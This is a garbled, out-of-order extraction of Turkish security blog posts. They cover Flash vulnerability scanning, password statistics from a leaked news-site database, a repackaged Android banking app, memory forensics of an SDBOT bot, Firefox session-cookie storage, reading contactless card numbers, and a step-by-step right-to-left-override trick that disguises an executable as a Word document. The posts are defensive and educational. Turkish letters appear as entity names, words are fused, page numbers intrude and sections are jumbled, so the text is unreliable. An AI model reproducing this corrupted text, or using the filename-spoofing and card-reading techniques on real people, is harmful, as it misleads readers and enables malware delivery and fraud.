bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 4: Hack 4 Career - 2011

4

Zararlı yazılımı ccedilalıştırır ccedilalıştırmaz Wireshark aracı uumlzerinde HTTP ve IRC trafiği oluştuğunu goumlrduumlm ve bir IRC istemci yazılımı iletespit edilen bu IRC sunucusuna bağlandım Sunucuya bağlandığımda kanalın boş olması botların ifşa olmasını engelleme adına oumlzelolarak geliştirilmişmodifiye edilmiş bir irc sunucusu olduğuna işaret ediyordu Botun IRC kanalına giriş yapar yapmaz internete ccedilıkışyaptığı ip adres bloğunun 445 bağlantı noktasını otomatik olarak taramaya (port scan) başlaması da goumlzuumlmden kaccedilmadı Wiresharkuumlzerindeki HTTP paketlerini incelediğimde ise botun NATlanmış IP adresini oumlğrenebilmek iccedilin bir kaccedil sayfaya bağlanmaya ccedilalıştığınıfarkettim

5

Zararlı yazılım ile ilgili daha fazla bilgi almak iccedilin Volatility ile bellek dosyasını incelemeye başladım

İlk olarak PSLIST komutu ile sistem uumlzerinde ccedilalışan işlemleri (process) listeledim ve ccedilalıştırılma zamanına goumlre zararlı yazılımın sistemuumlzerinde 2888 PIDsine sahip indekexe adı altında ccedilalıştığını goumlrduumlm

6

DLLLIST komutu ile zararlı yazılım tarafından yuumlklenen DLL dosyalarını listelediğimde ise urlmondll ve cryptdlldll dosyaları şuumlpheliduruyordu

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

